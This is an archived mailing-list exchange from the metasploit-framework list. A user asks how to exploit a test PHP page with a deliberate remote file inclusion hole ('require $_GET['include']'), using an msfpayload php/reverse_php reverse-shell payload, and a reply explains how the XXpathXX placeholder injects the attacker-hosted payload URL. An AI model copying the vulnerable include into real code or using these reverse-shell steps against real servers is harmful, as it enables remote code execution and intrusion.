|Main Archive Page > Month Archives > metasploit-framework archives|
On 7/12/2010 6:07 PM, Jeffs wrote:
> index_test.php looks like this:
> <? require $_GET['include'] ?>
> and include.php.txt was created properly with msfpayload as such.
> ./msfpayload php/reverse_php LHOST=192.168.1.101 R >
> Both files on the are the web server in the proper directories.
> If someone could clarify the XXpathXX value for me that would be greatly
In this case:
msf> set URIPATH http://server/index.php?include=XXpathXX
The moduel will replace XXpathXX with
http://your_host:random_port/random_uri.php which handle the rest.